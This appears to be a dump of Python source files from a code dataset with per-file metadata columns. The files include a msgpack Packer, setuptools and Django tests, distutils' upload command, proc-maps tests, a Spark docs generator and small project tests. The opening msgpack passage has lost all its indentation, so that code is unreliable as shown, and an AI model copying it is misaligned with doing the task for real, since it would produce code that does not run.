ret = self._fb_unpack(EX_CONSTRUCT, write_bytes)
self._fb_consume()
return ret
def read_array_header(self, write_bytes=None):
ret = self._fb_unpack(EX_READ_ARRAY_HEADER, write_bytes)
self._fb_consume()
return ret
def read_map_header(self, write_bytes=None):
ret = self._fb_unpack(EX_READ_MAP_HEADER, write_bytes)
self._fb_consume()
return ret
class Packer(object):
"""
MessagePack Packer
usage:
packer = Packer()
astream.write(packer.pack(a))
astream.write(packer.pack(b))
Packer's constructor has some keyword arguments:
:param callable default:
Convert user type to builtin type that Packer supports.
See also simplejson's document.
:param str encoding:
Convert unicode to bytes with this encoding. (default: 'utf-8')
:param str unicode_errors:
Error handler for encoding unicode. (default: 'strict')
:param bool use_single_float:
Use single precision float type for float. (default: False)
:param bool autoreset:
        Reset buffer after each pack and return its content as `bytes`. (default: True).
If set this to false, use `bytes()` to get content and `.reset()` to clear buffer.
:param bool use_bin_type:
Use bin type introduced in msgpack spec 2.0 for bytes.
        It also enables str8 type for unicode.
"""
def __init__(self, default=None, encoding='utf-8', unicode_errors='strict',
use_single_float=False, autoreset=True, use_bin_type=False):
self._use_float = use_single_float
self._autoreset = autoreset
self._use_bin_type = use_bin_type
self._encoding = encoding
self._unicode_errors = unicode_errors
self._buffer = StringIO()
if default is not None:
if not callable(default):
raise TypeError("default must be callable")
self._default = default
def _pack(self, obj, nest_limit=DEFAULT_RECURSE_LIMIT, isinstance=isinstance):
default_used = False
while True:
if nest_limit < 0:
raise PackValueError("recursion limit exceeded")
if obj is None:
return self._buffer.write(b"\xc0")
if isinstance(obj, bool):
if obj:
return self._buffer.write(b"\xc3")
return self._buffer.write(b"\xc2")
if isinstance(obj, int_types):
if 0 <= obj < 0x80:
return self._buffer.write(struct.pack("B", obj))
if -0x20 <= obj < 0:
return self._buffer.write(struct.pack("b", obj))
if 0x80 <= obj <= 0xff:
return self._buffer.write(struct.pack("BB", 0xcc, obj))
if -0x80 <= obj < 0:
return self._buffer.write(struct.pack(">Bb", 0xd0, obj))
if 0xff < obj <= 0xffff:
return self._buffer.write(struct.pack(">BH", 0xcd, obj))
if -0x8000 <= obj < -0x80:
return self._buffer.write(struct.pack(">Bh", 0xd1, obj))
if 0xffff < obj <= 0xffffffff:
return self._buffer.write(struct.pack(">BI", 0xce, obj))
if -0x80000000 <= obj < -0x8000:
return self._buffer.write(struct.pack(">Bi", 0xd2, obj))
if 0xffffffff < obj <= 0xffffffffffffffff:
return self._buffer.write(struct.pack(">BQ", 0xcf, obj))
if -0x8000000000000000 <= obj < -0x80000000:
return self._buffer.write(struct.pack(">Bq", 0xd3, obj))
raise PackValueError("Integer value out of range")
if self._use_bin_type and isinstance(obj, bytes):
n = len(obj)
if n <= 0xff:
self._buffer.write(struct.pack('>BB', 0xc4, n))
elif n <= 0xffff:
self._buffer.write(struct.pack(">BH", 0xc5, n))
elif n <= 0xffffffff:
self._buffer.write(struct.pack(">BI", 0xc6, n))
else:
raise PackValueError("Bytes is too large")
return self._buffer.write(obj)
if isinstance(obj, (Unicode, bytes)):
if isinstance(obj, Unicode):
if self._encoding is None:
raise TypeError(
"Can't encode unicode string: "
"no encoding is specified")
obj = obj.encode(self._encoding, self._unicode_errors)
n = len(obj)
if n <= 0x1f:
self._buffer.write(struct.pack('B', 0xa0 + n))
elif self._use_bin_type and n <= 0xff:
self._buffer.write(struct.pack('>BB', 0xd9, n))
elif n <= 0xffff:
self._buffer.write(struct.pack(">BH", 0xda, n))
elif n <= 0xffffffff:
self._buffer.write(struct.pack(">BI", 0xdb, n))
else:
raise PackValueError("String is too large")
return self._buffer.write(obj)
if isinstance(obj, float):
if self._use_float:
return self._buffer.write(struct.pack(">Bf", 0xca, obj))
return self._buffer.write(struct.pack(">Bd", 0xcb, obj))
if isinstance(obj, ExtType):
code = obj.code
data = obj.data
assert isinstance(code, int)
assert isinstance(data, bytes)
L = len(data)
if L == 1:
self._buffer.write(b'\xd4')
elif L == 2:
self._buffer.write(b'\xd5')
elif L == 4:
self._buffer.write(b'\xd6')
elif L == 8:
self._buffer.write(b'\xd7')
elif L == 16:
self._buffer.write(b'\xd8')
elif L <= 0xff:
self._buffer.write(struct.pack(">BB", 0xc7, L))
elif L <= 0xffff:
self._buffer.write(struct.pack(">BH", 0xc8, L))
else:
self._buffer.write(struct.pack(">BI", 0xc9, L))
self._buffer.write(struct.pack("b", code))
self._buffer.write(data)
return
if isinstance(obj, (list, tuple)):
n = len(obj)
self._fb_pack_array_header(n)
for i in xrange(n):
self._pack(obj[i], nest_limit - 1)
return
if isinstance(obj, dict):
return self._fb_pack_map_pairs(len(obj), dict_iteritems(obj),
nest_limit - 1)
if not default_used and self._default is not None:
obj = self._default(obj)
default_used = 1
continue
raise TypeError("Cannot serialize %r" % obj)
def pack(self, obj):
self._pack(obj)
ret = self._buffer.getvalue()
if self._autoreset:
self._buffer = StringIO()
elif USING_STRINGBUILDER:
self._buffer = StringIO(ret)
return ret
def pack_map_pairs(self, pairs):
self._fb_pack_map_pairs(len(pairs), pairs)
ret = self._buffer.getvalue()
if self._autoreset:
self._buffer = StringIO()
elif USING_STRINGBUILDER:
self._buffer = StringIO(ret)
return ret
def pack_array_header(self, n):
if n >= 2**32:
raise ValueError
self._fb_pack_array_header(n)
ret = self._buffer.getvalue()
if self._autoreset:
self._buffer = StringIO()
elif USING_STRINGBUILDER:
self._buffer = StringIO(ret)
return ret
def pack_map_header(self, n):
if n >= 2**32:
raise ValueError
self._fb_pack_map_header(n)
ret = self._buffer.getvalue()
if self._autoreset:
self._buffer = StringIO()
elif USING_STRINGBUILDER:
self._buffer = StringIO(ret)
return ret
def pack_ext_type(self, typecode, data):
if not isinstance(typecode, int):
raise TypeError("typecode must have int type.")
if not 0 <= typecode <= 127:
raise ValueError("typecode should be 0-127")
if not isinstance(data, bytes):
raise TypeError("data must have bytes type")
L = len(data)
if L > 0xffffffff:
raise ValueError("Too large data")
if L == 1:
self._buffer.write(b'\xd4')
elif L == 2:
self._buffer.write(b'\xd5')
elif L == 4:
self._buffer.write(b'\xd6')
elif L == 8:
self._buffer.write(b'\xd7')
elif L == 16:
self._buffer.write(b'\xd8')
elif L <= 0xff:
self._buffer.write(b'\xc7' + struct.pack('B', L))
elif L <= 0xffff:
self._buffer.write(b'\xc8' + struct.pack('>H', L))
else:
self._buffer.write(b'\xc9' + struct.pack('>I', L))
self._buffer.write(struct.pack('B', typecode))
self._buffer.write(data)
def _fb_pack_array_header(self, n):
if n <= 0x0f:
return self._buffer.write(struct.pack('B', 0x90 + n))
if n <= 0xffff:
return self._buffer.write(struct.pack(">BH", 0xdc, n))
if n <= 0xffffffff:
return self._buffer.write(struct.pack(">BI", 0xdd, n))
raise PackValueError("Array is too large")
def _fb_pack_map_header(self, n):
if n <= 0x0f:
return self._buffer.write(struct.pack('B', 0x80 + n))
if n <= 0xffff:
return self._buffer.write(struct.pack(">BH", 0xde, n))
if n <= 0xffffffff:
return self._buffer.write(struct.pack(">BI", 0xdf, n))
raise PackValueError("Dict is too large")
def _fb_pack_map_pairs(self, n, pairs, nest_limit=DEFAULT_RECURSE_LIMIT):
self._fb_pack_map_header(n)
for (k, v) in pairs:
self._pack(k, nest_limit - 1)
self._pack(v, nest_limit - 1)
def bytes(self):
return self._buffer.getvalue()
def reset(self):
self._buffer = StringIO()
| mit | 335,946,032,770,226,560 | 35.978992 | 90 | 0.524069 | false |
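For reference, a minimal usage sketch of the fallback Packer defined above. The import path and the default autoreset behaviour (buffer reset after each pack call) are assumptions; the expected byte strings follow directly from the branches in _pack.
# Usage sketch (assumed import path; byte values follow the _pack branches above).
from msgpack.fallback import Packer
packer = Packer(use_bin_type=True)
packer.pack(None)   # -> b"\xc0"  (nil)
packer.pack(True)   # -> b"\xc3"  (true)
packer.pack(5)      # -> b"\x05"  (positive fixint, 0 <= n < 0x80)
packer.pack(-3)     # -> b"\xfd"  (negative fixint, -0x20 <= n < 0)
packer.pack(b"hi")  # -> b"\xc4\x02hi"  (bin 8 header, since use_bin_type is set)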
djabber/Dashboard | bottle/dash/local/lib/python2.7/site-packages/setuptools/tests/server.py | 452 | 2651 | """Basic http server for tests to simulate PyPI or custom indexes
"""
import sys
import time
import threading
from setuptools.compat import BaseHTTPRequestHandler
from setuptools.compat import (urllib2, URLError, HTTPServer,
SimpleHTTPRequestHandler)
class IndexServer(HTTPServer):
"""Basic single-threaded http server simulating a package index
You can use this server in unittest like this::
s = IndexServer()
s.start()
index_url = s.base_url() + 'mytestindex'
# do some test requests to the index
# The index files should be located in setuptools/tests/indexes
s.stop()
"""
def __init__(self, server_address=('', 0),
RequestHandlerClass=SimpleHTTPRequestHandler):
HTTPServer.__init__(self, server_address, RequestHandlerClass)
self._run = True
def serve(self):
while self._run:
self.handle_request()
def start(self):
self.thread = threading.Thread(target=self.serve)
self.thread.start()
def stop(self):
"Stop the server"
# Let the server finish the last request and wait for a new one.
time.sleep(0.1)
# self.shutdown is not supported on python < 2.6, so just
# set _run to false, and make a request, causing it to
# terminate.
self._run = False
url = 'http://127.0.0.1:%(server_port)s/' % vars(self)
try:
if sys.version_info >= (2, 6):
urllib2.urlopen(url, timeout=5)
else:
urllib2.urlopen(url)
except URLError:
# ignore any errors; all that's important is the request
pass
self.thread.join()
self.socket.close()
def base_url(self):
port = self.server_port
return 'http://127.0.0.1:%s/setuptools/tests/indexes/' % port
class RequestRecorder(BaseHTTPRequestHandler):
def do_GET(self):
requests = vars(self.server).setdefault('requests', [])
requests.append(self)
self.send_response(200, 'OK')
class MockServer(HTTPServer, threading.Thread):
"""
A simple HTTP Server that records the requests made to it.
"""
def __init__(self, server_address=('', 0),
RequestHandlerClass=RequestRecorder):
HTTPServer.__init__(self, server_address, RequestHandlerClass)
threading.Thread.__init__(self)
self.setDaemon(True)
self.requests = []
def run(self):
self.serve_forever()
def url(self):
return 'http://localhost:%(server_port)s/' % vars(self)
url = property(url)
| mit | -8,197,405,527,002,301,000 | 31.329268 | 72 | 0.607695 | false |
dexterx17/nodoSocket | clients/Python-2.7.6/Lib/distutils/command/upload.py | 176 | 7002 | """distutils.command.upload
Implements the Distutils 'upload' subcommand (upload package to PyPI)."""
import os
import socket
import platform
from urllib2 import urlopen, Request, HTTPError
from base64 import standard_b64encode
import urlparse
import cStringIO as StringIO
from hashlib import md5
from distutils.errors import DistutilsOptionError
from distutils.core import PyPIRCCommand
from distutils.spawn import spawn
from distutils import log
class upload(PyPIRCCommand):
description = "upload binary package to PyPI"
user_options = PyPIRCCommand.user_options + [
('sign', 's',
'sign files to upload using gpg'),
('identity=', 'i', 'GPG identity used to sign files'),
]
boolean_options = PyPIRCCommand.boolean_options + ['sign']
def initialize_options(self):
PyPIRCCommand.initialize_options(self)
self.username = ''
self.password = ''
self.show_response = 0
self.sign = False
self.identity = None
def finalize_options(self):
PyPIRCCommand.finalize_options(self)
if self.identity and not self.sign:
raise DistutilsOptionError(
"Must use --sign for --identity to have meaning"
)
config = self._read_pypirc()
if config != {}:
self.username = config['username']
self.password = config['password']
self.repository = config['repository']
self.realm = config['realm']
# getting the password from the distribution
# if previously set by the register command
if not self.password and self.distribution.password:
self.password = self.distribution.password
def run(self):
if not self.distribution.dist_files:
raise DistutilsOptionError("No dist file created in earlier command")
for command, pyversion, filename in self.distribution.dist_files:
self.upload_file(command, pyversion, filename)
def upload_file(self, command, pyversion, filename):
# Makes sure the repository URL is compliant
schema, netloc, url, params, query, fragments = \
urlparse.urlparse(self.repository)
if params or query or fragments:
raise AssertionError("Incompatible url %s" % self.repository)
if schema not in ('http', 'https'):
raise AssertionError("unsupported schema " + schema)
# Sign if requested
if self.sign:
gpg_args = ["gpg", "--detach-sign", "-a", filename]
if self.identity:
gpg_args[2:2] = ["--local-user", self.identity]
spawn(gpg_args,
dry_run=self.dry_run)
# Fill in the data - send all the meta-data in case we need to
# register a new release
f = open(filename,'rb')
try:
content = f.read()
finally:
f.close()
meta = self.distribution.metadata
data = {
# action
':action': 'file_upload',
'protcol_version': '1',
# identify release
'name': meta.get_name(),
'version': meta.get_version(),
# file content
'content': (os.path.basename(filename),content),
'filetype': command,
'pyversion': pyversion,
'md5_digest': md5(content).hexdigest(),
# additional meta-data
'metadata_version' : '1.0',
'summary': meta.get_description(),
'home_page': meta.get_url(),
'author': meta.get_contact(),
'author_email': meta.get_contact_email(),
'license': meta.get_licence(),
'description': meta.get_long_description(),
'keywords': meta.get_keywords(),
'platform': meta.get_platforms(),
'classifiers': meta.get_classifiers(),
'download_url': meta.get_download_url(),
# PEP 314
'provides': meta.get_provides(),
'requires': meta.get_requires(),
'obsoletes': meta.get_obsoletes(),
}
comment = ''
if command == 'bdist_rpm':
dist, version, id = platform.dist()
if dist:
comment = 'built for %s %s' % (dist, version)
elif command == 'bdist_dumb':
comment = 'built for %s' % platform.platform(terse=1)
data['comment'] = comment
if self.sign:
data['gpg_signature'] = (os.path.basename(filename) + ".asc",
open(filename+".asc").read())
# set up the authentication
auth = "Basic " + standard_b64encode(self.username + ":" +
self.password)
# Build up the MIME payload for the POST data
boundary = '--------------GHSKFJDLGDS7543FJKLFHRE75642756743254'
sep_boundary = '\n--' + boundary
end_boundary = sep_boundary + '--'
body = StringIO.StringIO()
for key, value in data.items():
# handle multiple entries for the same name
if not isinstance(value, list):
value = [value]
for value in value:
if isinstance(value, tuple):
fn = ';filename="%s"' % value[0]
value = value[1]
else:
fn = ""
body.write(sep_boundary)
body.write('\nContent-Disposition: form-data; name="%s"'%key)
body.write(fn)
body.write("\n\n")
body.write(value)
if value and value[-1] == '\r':
body.write('\n') # write an extra newline (lurve Macs)
body.write(end_boundary)
body.write("\n")
body = body.getvalue()
self.announce("Submitting %s to %s" % (filename, self.repository), log.INFO)
# build the Request
headers = {'Content-type':
'multipart/form-data; boundary=%s' % boundary,
'Content-length': str(len(body)),
'Authorization': auth}
request = Request(self.repository, data=body,
headers=headers)
# send the data
try:
result = urlopen(request)
status = result.getcode()
reason = result.msg
if self.show_response:
                msg = '\n'.join(('-' * 75, result.read(), '-' * 75))
self.announce(msg, log.INFO)
except socket.error, e:
self.announce(str(e), log.ERROR)
return
except HTTPError, e:
status = e.code
reason = e.msg
if status == 200:
self.announce('Server response (%s): %s' % (status, reason),
log.INFO)
else:
self.announce('Upload failed (%s): %s' % (status, reason),
log.ERROR)
| mit | -8,618,214,291,133,476,000 | 35.092784 | 84 | 0.537846 | false |
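The upload body built above is a hand-rolled multipart/form-data payload. Below is a condensed, standalone restatement of that loop for two plain string fields (illustrative only; the real method also handles tuples carrying the file content and the optional GPG signature).
# Sketch of the multipart body construction used by upload_file above.
boundary = '--------------GHSKFJDLGDS7543FJKLFHRE75642756743254'
sep_boundary = '\n--' + boundary
end_boundary = sep_boundary + '--'
fields = {':action': 'file_upload', 'protcol_version': '1'}  # illustrative subset of `data`
body = ''
for key, value in fields.items():
    body += sep_boundary
    body += '\nContent-Disposition: form-data; name="%s"' % key
    body += "\n\n" + value
body += end_boundary + "\n"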
baylee/django | tests/template_tests/filter_tests/test_dictsortreversed.py | 181 | 1686 | from django.template.defaultfilters import dictsortreversed
from django.test import SimpleTestCase
class FunctionTests(SimpleTestCase):
def test_sort(self):
sorted_dicts = dictsortreversed(
[{'age': 23, 'name': 'Barbara-Ann'},
{'age': 63, 'name': 'Ra Ra Rasputin'},
{'name': 'Jonny B Goode', 'age': 18}],
'age',
)
self.assertEqual(
[sorted(dict.items()) for dict in sorted_dicts],
[[('age', 63), ('name', 'Ra Ra Rasputin')],
[('age', 23), ('name', 'Barbara-Ann')],
[('age', 18), ('name', 'Jonny B Goode')]],
)
def test_sort_list_of_tuples(self):
data = [('a', '42'), ('c', 'string'), ('b', 'foo')]
expected = [('c', 'string'), ('b', 'foo'), ('a', '42')]
self.assertEqual(dictsortreversed(data, 0), expected)
def test_sort_list_of_tuple_like_dicts(self):
data = [
{'0': 'a', '1': '42'},
{'0': 'c', '1': 'string'},
{'0': 'b', '1': 'foo'},
]
expected = [
{'0': 'c', '1': 'string'},
{'0': 'b', '1': 'foo'},
{'0': 'a', '1': '42'},
]
self.assertEqual(dictsortreversed(data, '0'), expected)
def test_invalid_values(self):
"""
If dictsortreversed is passed something other than a list of
dictionaries, fail silently.
"""
self.assertEqual(dictsortreversed([1, 2, 3], 'age'), '')
self.assertEqual(dictsortreversed('Hello!', 'age'), '')
self.assertEqual(dictsortreversed({'a': 1}, 'age'), '')
self.assertEqual(dictsortreversed(1, 'age'), '')
| bsd-3-clause | -4,918,233,202,347,198,000 | 34.125 | 68 | 0.488138 | false |
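In a template, the filter exercised by these tests is applied with the usual Django filter-argument syntax (variable and key names here are illustrative):
{{ people|dictsortreversed:"age" }}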
p4datasystems/CarnotKE | jyhton/lib-python/2.7/plat-linux2/DLFCN.py | 158 | 1628 | # Generated by h2py from /usr/include/dlfcn.h
_DLFCN_H = 1
# Included from features.h
_FEATURES_H = 1
__USE_ANSI = 1
__FAVOR_BSD = 1
_ISOC99_SOURCE = 1
_POSIX_SOURCE = 1
_POSIX_C_SOURCE = 199506L
_XOPEN_SOURCE = 600
_XOPEN_SOURCE_EXTENDED = 1
_LARGEFILE64_SOURCE = 1
_BSD_SOURCE = 1
_SVID_SOURCE = 1
_BSD_SOURCE = 1
_SVID_SOURCE = 1
__USE_ISOC99 = 1
_POSIX_SOURCE = 1
_POSIX_C_SOURCE = 2
_POSIX_C_SOURCE = 199506L
__USE_POSIX = 1
__USE_POSIX2 = 1
__USE_POSIX199309 = 1
__USE_POSIX199506 = 1
__USE_XOPEN = 1
__USE_XOPEN_EXTENDED = 1
__USE_UNIX98 = 1
_LARGEFILE_SOURCE = 1
__USE_XOPEN2K = 1
__USE_ISOC99 = 1
__USE_XOPEN_EXTENDED = 1
__USE_LARGEFILE = 1
__USE_LARGEFILE64 = 1
__USE_FILE_OFFSET64 = 1
__USE_MISC = 1
__USE_BSD = 1
__USE_SVID = 1
__USE_GNU = 1
__USE_REENTRANT = 1
__STDC_IEC_559__ = 1
__STDC_IEC_559_COMPLEX__ = 1
__STDC_ISO_10646__ = 200009L
__GNU_LIBRARY__ = 6
__GLIBC__ = 2
__GLIBC_MINOR__ = 2
# Included from sys/cdefs.h
_SYS_CDEFS_H = 1
def __PMT(args): return args
def __P(args): return args
def __PMT(args): return args
def __STRING(x): return #x
__flexarr = []
__flexarr = [0]
__flexarr = []
__flexarr = [1]
def __ASMNAME(cname): return __ASMNAME2 (__USER_LABEL_PREFIX__, cname)
def __attribute__(xyz): return
def __attribute_format_arg__(x): return __attribute__ ((__format_arg__ (x)))
def __attribute_format_arg__(x): return
__USE_LARGEFILE = 1
__USE_LARGEFILE64 = 1
__USE_EXTERN_INLINES = 1
# Included from gnu/stubs.h
# Included from bits/dlfcn.h
RTLD_LAZY = 0x00001
RTLD_NOW = 0x00002
RTLD_BINDING_MASK = 0x3
RTLD_NOLOAD = 0x00004
RTLD_GLOBAL = 0x00100
RTLD_LOCAL = 0
RTLD_NODELETE = 0x01000
| apache-2.0 | 2,696,901,573,539,431,400 | 18.614458 | 76 | 0.652948 | false |
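These RTLD_* constants are normally combined with sys.setdlopenflags() (a standard CPython API on Unix) before importing an extension module. A minimal sketch, assuming a Linux Python 2 where this platform module is importable and with a hypothetical extension name:
import sys
import DLFCN
sys.setdlopenflags(DLFCN.RTLD_NOW | DLFCN.RTLD_GLOBAL)
import some_extension  # hypothetical C extension that needs global symbol visibility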
zcbenz/cefode-chromium | tools/find_runtime_symbols/tests/proc_maps_test.py | 38 | 4611 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import cStringIO
import logging
import os
import sys
import unittest
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, ROOT_DIR)
from proc_maps import ProcMaps
class ProcMapsTest(unittest.TestCase):
_TEST_PROCMAPS = '\n'.join([
'00000000-00001000 r--p 00000000 fc:00 0',
'0080b000-0080c000 r-xp 0020b000 fc:00 2231329'
' /usr/bin/some',
'0080c000-0080f000 ---p 0020c000 fc:00 2231329'
' /usr/bin/some',
'0100a000-0100c000 r-xp 0120a000 fc:00 22381'
' /usr/bin/chrome',
'0100c000-0100f000 ---p 0120c000 fc:00 22381'
' /usr/bin/chrome',
'0237d000-02a9b000 rw-p 00000000 00:00 0'
' [heap]',
'7fb920e6d000-7fb920e85000 r-xp 00000000 fc:00 263482'
' /lib/x86_64-linux-gnu/libpthread-2.15.so',
'7fb920e85000-7fb921084000 ---p 00018000 fc:00 263482'
' /lib/x86_64-linux-gnu/libpthread-2.15.so',
'7fb9225f4000-7fb922654000 rw-s 00000000 00:04 19660808'
' /SYSV00000000 (deleted)',
'ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0'
' [vsyscall]',
])
_EXPECTED = [
(0x0, 0x1000, 'r', '-', '-', 'p', 0x0, 'fc', '00', 0, ''),
(0x80b000, 0x80c000, 'r', '-', 'x', 'p', 0x20b000,
'fc', '00', 2231329, '/usr/bin/some'),
(0x80c000, 0x80f000, '-', '-', '-', 'p', 0x20c000,
'fc', '00', 2231329, '/usr/bin/some'),
(0x100a000, 0x100c000, 'r', '-', 'x', 'p', 0x120a000,
'fc', '00', 22381, '/usr/bin/chrome'),
(0x100c000, 0x100f000, '-', '-', '-', 'p', 0x120c000,
'fc', '00', 22381, '/usr/bin/chrome'),
(0x237d000, 0x2a9b000, 'r', 'w', '-', 'p', 0x0,
'00', '00', 0, '[heap]'),
(0x7fb920e6d000, 0x7fb920e85000, 'r', '-', 'x', 'p', 0x0,
'fc', '00', 263482, '/lib/x86_64-linux-gnu/libpthread-2.15.so'),
(0x7fb920e85000, 0x7fb921084000, '-', '-', '-', 'p', 0x18000,
'fc', '00', 263482, '/lib/x86_64-linux-gnu/libpthread-2.15.so'),
(0x7fb9225f4000, 0x7fb922654000, 'r', 'w', '-', 's', 0x0,
'00', '04', 19660808, '/SYSV00000000 (deleted)'),
(0xffffffffff600000, 0xffffffffff601000, 'r', '-', 'x', 'p', 0x0,
'00', '00', 0, '[vsyscall]'),
]
@staticmethod
def _expected_as_dict(index):
return {
'begin': ProcMapsTest._EXPECTED[index][0],
'end': ProcMapsTest._EXPECTED[index][1],
'readable': ProcMapsTest._EXPECTED[index][2],
'writable': ProcMapsTest._EXPECTED[index][3],
'executable': ProcMapsTest._EXPECTED[index][4],
'private': ProcMapsTest._EXPECTED[index][5],
'offset': ProcMapsTest._EXPECTED[index][6],
'major': ProcMapsTest._EXPECTED[index][7],
'minor': ProcMapsTest._EXPECTED[index][8],
'inode': ProcMapsTest._EXPECTED[index][9],
'name': ProcMapsTest._EXPECTED[index][10],
}
def test_load(self):
maps = ProcMaps.load(cStringIO.StringIO(self._TEST_PROCMAPS))
for index, entry in enumerate(maps):
self.assertEqual(entry.as_dict(), self._expected_as_dict(index))
def test_constants(self):
maps = ProcMaps.load(cStringIO.StringIO(self._TEST_PROCMAPS))
selected = [4, 7]
for index, entry in enumerate(maps.iter(ProcMaps.constants)):
self.assertEqual(entry.as_dict(),
self._expected_as_dict(selected[index]))
def test_executable(self):
maps = ProcMaps.load(cStringIO.StringIO(self._TEST_PROCMAPS))
selected = [3, 6]
for index, entry in enumerate(maps.iter(ProcMaps.executable)):
self.assertEqual(entry.as_dict(),
self._expected_as_dict(selected[index]))
def test_executable_and_constants(self):
maps = ProcMaps.load(cStringIO.StringIO(self._TEST_PROCMAPS))
selected = [3, 4, 6, 7]
for index, entry in enumerate(maps.iter(ProcMaps.executable_and_constants)):
self.assertEqual(entry.as_dict(),
self._expected_as_dict(selected[index]))
if __name__ == '__main__':
logging.basicConfig(
level=logging.DEBUG if '-v' in sys.argv else logging.ERROR,
format='%(levelname)5s %(filename)15s(%(lineno)3d): %(message)s')
unittest.main()
| bsd-3-clause | -4,947,077,876,686,821,000 | 40.918182 | 80 | 0.574279 | false |
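Outside the unit test, the parser is typically fed a real /proc/<pid>/maps file. A short sketch (standard Linux path; the loop body is illustrative):
# Parse the current process' mappings and walk the executable regions.
from proc_maps import ProcMaps  # same import as in the test above
with open('/proc/self/maps') as f:
    maps = ProcMaps.load(f)
for entry in maps.iter(ProcMaps.executable):
    print(entry.as_dict()['name'])  # fields as in _EXPECTED above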
wangyum/spark | sql/gen-sql-config-docs.py | 15 | 4773 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import re
from collections import namedtuple
from textwrap import dedent
# To avoid adding a new direct dependency, we import markdown from within mkdocs.
from mkdocs.structure.pages import markdown
from pyspark.java_gateway import launch_gateway
SQLConfEntry = namedtuple(
"SQLConfEntry", ["name", "default", "description", "version"])
def get_sql_configs(jvm, group):
if group == "static":
config_set = jvm.org.apache.spark.sql.api.python.PythonSQLUtils.listStaticSQLConfigs()
else:
config_set = jvm.org.apache.spark.sql.api.python.PythonSQLUtils.listRuntimeSQLConfigs()
sql_configs = [
SQLConfEntry(
name=_sql_config._1(),
default=_sql_config._2(),
description=_sql_config._3(),
version=_sql_config._4()
)
for _sql_config in config_set
]
return sql_configs
def generate_sql_configs_table_html(sql_configs, path):
"""
Generates an HTML table at `path` that lists all public SQL
configuration options.
The table will look something like this:
```html
<table class="table">
<tr><th>Property Name</th><th>Default</th><th>Meaning</th><th>Since Version</th></tr>
<tr>
<td><code>spark.sql.adaptive.enabled</code></td>
<td>false</td>
<td><p>When true, enable adaptive query execution.</p></td>
<td>2.1.0</td>
</tr>
...
</table>
```
"""
value_reference_pattern = re.compile(r"^<value of (\S*)>$")
with open(path, 'w') as f:
f.write(dedent(
"""
<table class="table">
<tr><th>Property Name</th><th>Default</th><th>Meaning</th><th>Since Version</th></tr>
"""
))
for config in sorted(sql_configs, key=lambda x: x.name):
if config.name == "spark.sql.session.timeZone":
default = "(value of local timezone)"
elif config.name == "spark.sql.warehouse.dir":
default = "(value of <code>$PWD/spark-warehouse</code>)"
elif config.default == "<undefined>":
default = "(none)"
elif config.default.startswith("<value of "):
referenced_config_name = value_reference_pattern.match(config.default).group(1)
default = "(value of <code>{}</code>)".format(referenced_config_name)
else:
default = config.default
if default.startswith("<"):
raise Exception(
"Unhandled reference in SQL config docs. Config '{name}' "
"has default '{default}' that looks like an HTML tag."
.format(
name=config.name,
default=config.default,
)
)
f.write(dedent(
"""
<tr>
<td><code>{name}</code></td>
<td>{default}</td>
<td>{description}</td>
<td>{version}</td>
</tr>
"""
.format(
name=config.name,
default=default,
description=markdown.markdown(config.description),
version=config.version
)
))
f.write("</table>\n")
if __name__ == "__main__":
jvm = launch_gateway().jvm
docs_root_dir = os.path.join(os.path.dirname(os.path.dirname(__file__)), "docs")
sql_configs = get_sql_configs(jvm, "runtime")
sql_configs_table_path = os.path.join(docs_root_dir, "generated-runtime-sql-config-table.html")
generate_sql_configs_table_html(sql_configs, path=sql_configs_table_path)
sql_configs = get_sql_configs(jvm, "static")
sql_configs_table_path = os.path.join(docs_root_dir, "generated-static-sql-config-table.html")
generate_sql_configs_table_html(sql_configs, path=sql_configs_table_path)
| apache-2.0 | -6,565,091,840,375,546,000 | 34.355556 | 99 | 0.586424 | false |
lybicat/lybica-runner | tst/test_lybica/actions/user_script.py | 1 | 1597 | from unittest import TestCase
from lybica.actions.user_script import _UserScriptAction
from lybica.__main__ import Context
import os
import shutil
class TestUserScriptAction(TestCase):
def setUp(self):
super(TestUserScriptAction, self).setUp()
self.context = Context()
os.environ['WORKSPACE'] = './ut_logs'
self.context.WORKSPACE = './ut_logs'
os.makedirs(self.context.WORKSPACE)
def tearDown(self):
if os.path.exists(self.context.WORKSPACE):
shutil.rmtree(self.context.WORKSPACE)
def test_run_do_ut_action_under_case_root(self):
os.environ['CASE_ROOT'] = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..', 'testsuite'))
class _Action(_UserScriptAction):
def get_script_name(self):
return 'do_ut'
_Action()._run_script(self.context, {})
def test_run_do_lybica_ut_action_under_lybica_directory(self):
os.environ['CASE_ROOT'] = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..', 'testsuite'))
class _Action(_UserScriptAction):
def get_script_name(self):
return 'do_lybica_ut'
_Action()._run_script(self.context, {})
def test_run_do_undefined_action(self):
os.environ['CASE_ROOT'] = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..', 'testsuite'))
class _Action(_UserScriptAction):
def get_script_name(self):
return 'do_undefined'
self.assertRaises(RuntimeError, _Action()._run_script, self.context, {})
| mit | 5,165,583,143,240,525,000 | 37.02381 | 115 | 0.617408 | false |
kellyaj/pytactoe | pytactoe/test/test_computer.py | 1 | 3921 | import unittest
from mock import MagicMock
from pytactoe.board import Board
from pytactoe.computer import Computer
class ComputerTests(unittest.TestCase):
def setUp(self):
self.computer = Computer("O")
self.board = Board()
def test_computer_initializes_with_a_mark(self):
self.assertEqual("O", self.computer.mark)
def test_checking_first_move(self):
self.assertTrue(self.computer.is_first_move(self.board))
self.board.spots = [1, 2, 3, 4, "O", 6, 7, 8, 9]
self.assertFalse(self.computer.is_first_move(self.board))
self.board.spots =[1, "X", "X", "O", "X", "O", "O", "O", "X"]
self.assertFalse(self.computer.is_first_move(self.board))
class ComputerMoveChoiceTests(unittest.TestCase):
def setUp(self):
self.computer = Computer("O")
self.board = Board()
self.mock_presenter = MagicMock()
